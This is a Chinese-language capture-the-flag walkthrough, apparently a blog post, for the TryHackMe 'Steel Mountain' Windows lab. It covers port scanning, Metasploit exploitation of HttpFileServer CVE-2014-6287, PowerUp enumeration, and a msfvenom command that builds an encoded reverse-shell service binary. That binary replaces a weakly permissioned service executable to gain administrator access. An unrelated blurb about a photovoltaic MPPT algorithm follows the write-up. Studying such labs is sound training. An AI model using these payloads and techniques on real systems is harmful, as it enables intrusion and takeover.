No.1--TryHackMe--Steel Mountain

难度:简单


目的:

黑进机器人先生主题的Windows电脑。使用metasploit进行初始访问,使用powershell进行Windows特权升级枚举,并学习一种新技术来获得Administrator访问权限。


任务1 介绍

在这个房间里,您将枚举一台Windows机器,使用Metasploit获得初始访问权限,使用Powershell进一步枚举机器并将您的权限升级为管理员。

如果您没有合适的安全工具和环境,可以部署您自己的Kali Linux机器,并使用我们的Kali Room在您的浏览器中控制它。

请注意,这台机器不响应ping (ICMP),可能需要几分钟才能启动。


回答下面的问题:

部署机器
谁是本月最佳员工?


解题步骤

端口扫描

nmap -sV [target_ip]

发现以下几个端口:

port 80/tcp - HTTP - (Microsoft IIS httpd 8.5)
port 135/tcp - msrpc - (Microsoft Windows RPC)
port 139/tcp - Samba
port 445/tcp - Samba
port 3389/tcp - RDP - (ssl/ms-wbt-server - Remote Desktop)
port 8080/tcp - HTTP - (HttpFileServer httpd 2.3)

我们看到其中有两个http服务,80和8080端口。
直接使用浏览器访问80端口,能够看到员工的照片,查看图片的文件名,是我的需要的员工名字。


任务2 初次登录

现在您已经部署了机器,让我们获得一个初始shell!


回答下面的问题

用nmap扫描机器。另一个运行web服务器的端口是什么?
看看另一个web服务器。哪个文件服务器正在运行?
利用此文件服务器的CVE编号是多少?
使用Metasploit获取初始shell。什么是用户标志?


解题步骤

根据开始的扫描,我们看到另一个web服务器的端口为8080。
使用浏览器访问8080端口,可以看到暴露了很多信息,
在这里插入图片描述
在server information中可以看到服务器的详细信息。
在刚才的网页中,我们已经看到了服务器的版本等信息,使用exploit - db搜索,发现存在可利用漏洞cve-2014-6287。
下一步使用msf搜索这个可利用漏洞,设置RHOSTS和RPORT为目标IP和8080端口,输入命令run即可成功利用。
在这里插入图片描述
再启动shell,在桌面上即可发现我们要的root.txt。


任务3 特权升级

现在您已经在这台Windows机器上以Bill的身份创建了一个初始shell,我们可以进一步枚举这台机器并将我们的权限升级为root!


回答下面的问题

为了枚举这台机器,我们将使用一个名为PowerUp的powershell脚本,其目的是评估Windows机器并确定任何异常- "

您可以在这里下载脚本。如果您想通过命令行下载它,请注意不要下载GitHub页面而不是原始脚本。现在您可以使用Metasploit中的upload命令来上传脚本。

要使用Meterpreter执行此操作,我将键入load powershell into Meterpreter。然后输入powershell_shell进入powershell:

密切关注设置为true的CanRestart选项。显示为漏洞的服务的名称是什么?

CanRestart选项为true时,允许我们重新启动系统上的服务,应用程序的目录也是可写的。这意味着我们可以用恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序!

上传二进制文件并替换合法文件。然后以root身份重新启动程序以获得shell。

注意:服务显示为未引用(并且可以使用此技术加以利用),然而,在这种情况下,我们利用了服务文件上的弱文件权限。

根标志是什么?


解题步骤

下载题目中提供的脚本,使用已经成功连接的msf将脚本上传到靶机,安装并使用powershell,启动脚本,使用Invoke-AllChecks命令来检查可提权的方式。找到设置为true的服务AdvancedSystemCareService9,使用msfvenom制作一个可执行文件:

msfvenom -p windows/shell_reverse_tcp LHOST=CONNECTION_IP LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

将此文件上传到靶机,停止刚才我们找到的服务,使用生成的可执行文件覆盖原同名文件,在开启服务前开启一个端口监听,开启服务后我们会得到一个反向shell,在管理员的桌面可以找到root.txt。


任务4 没有Metasploit的访问和升级

未完待续


重点理解

1.发现的可利用的服务
2.msf构造的可执行文件
3.反向shell原理

C语言-光伏MPPT算法:电导增量法扰动观察法+自动全局搜索Plecs最大功率跟踪算法仿真内容概要:本文档主要介绍了一种基于C语言实现的光伏最大功率点跟踪(MPPT)算法,结合电导增量法与扰动观察法,并引入自动全局搜索策略,利用Plecs仿真工具对算法进行建模与仿真验证。文档重点阐述了两种经典MPPT算法的原理、优缺点及其在不同光照和温度条件下的动态响应特性,同时提出一种改进的复合控制策略以提升系统在复杂环境下的跟踪精度与稳定性。通过仿真结果对比分析,验证了所提方法在快速性和准确性方面的优势,适用于光伏发电系统的高效能量转换控制。; 适合人群:具备一定C语言编程基础和电力电子知识背景,从事光伏系统开发、嵌入式控制或新能源技术研发的工程师及高校研究人员;工作年限1-3年的初级至中级研发人员尤为适合。; 使用场景及目标:①掌握电导增量法与扰动观察法在实际光伏系统中的实现机制与切换逻辑;②学习如何在Plecs中搭建MPPT控制系统仿真模型;③实现自动全局搜索以避免传统算法陷入局部峰值问题,提升复杂工况下的最大功率追踪效率;④为光伏逆变器或太阳能充电控制器的算法开发提供技术参考与实现范例。; 阅读建议:建议读者结合文中提供的C语言算法逻辑与Plecs仿真模型同步学习,重点关注算法判断条件、步长调节策略及仿真参数设置。在理解基本原理的基础上,可通过修改光照强度、温度变化曲线等外部扰动因素,进一步测试算法鲁棒性,并尝试将其移植到实际嵌入式平台进行实验验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值